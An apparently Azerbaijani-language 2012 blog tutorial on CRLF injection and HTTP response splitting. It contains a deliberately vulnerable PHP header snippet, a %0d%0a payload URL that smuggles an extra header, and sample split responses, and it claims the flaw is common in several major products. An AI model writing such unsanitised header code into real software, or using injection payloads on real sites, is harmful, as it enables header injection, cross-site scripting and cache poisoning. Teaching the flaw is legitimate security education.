пятница, 15 июня 2012 г.

CRLF injection / HTTP Response Splitting

CRLF Injection and HTTP Response Splitting

OWASP:https://www.owasp.org/index.php/HTTP_Response_Splitting

Hücum üçün CRLF (ASCİİ) simvollar göstərilə və daxil edilə bilər və bunun vasitəsi ilə HTTP cavab ayrılması olur

CR = %0d = \r
LF = %0a = \n

Məsələn:

<?php
header ("Referer: " . $_GET['page']);
?>


Baxırıq index.php?page=http://ownz.com/

HTTP Header
[] => HTTP/1.1 200 OK
[] => Date: Sat, 29 May 2004 12:28:13 GMT
[] => Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux)
[] => Referer: http://ownz.com/   
[] => Content-Length: 438
[] => Connection: close
[] => Content-Type: text/html

gördüyümüz kimi başlıqımızı aldıq

indi isə ascii simvollar ilə crlf inject edərək http cavab baslıqlarını ayıraq
http://localhost/ht.php?url=%0d%0a%20Fiydiriqbirsey:%3acoxistidi

indi isə baxaq

belə desək şifahi olaraq düşünək

[] => HTTP/1.1 200 OK
[] => Date: Sat, 29 May 2004 12:28:13 GMT
[] => Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux)
[] => Referer: http://ownz.com\r\nFiydiriqbirey:coxistidi
[] => Content-Length: 438
[] => Connection: close
[] => Content-Type: text/html

indi isə çıxdı dəyərimizə baxaq

[] => HTTP/1.1 200 OK
[] => Date: Sat, 29 May 2004 12:28:13 GMT
[] => Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux)
[] => Referer: http://ownz.com  
[] => Fiydiriqbirsey: coxistidi  
[] => Content-Length: 438
[] => Connection: close
[] => Content-Type: text/html

cixdi dəyərimizə baxdıq və gördükkü HTTP Response Splitting dediyimiz olay(HTTP Cavab ayirima)

danışdığım vulnerability vasitəsi ilə cross site scripting və yaxud sql injection kimi hücum metodlarından istifadə etmək üçün əlverişlidir

Qeyd edimki bu vulnerability CPANEL,Oracle,vBulletin,Google və adını cəkə bilmədiyim bir çok sistəmlərdə sıx sıx rastalaşmışıq.

Комментариев нет:

Отправить комментарий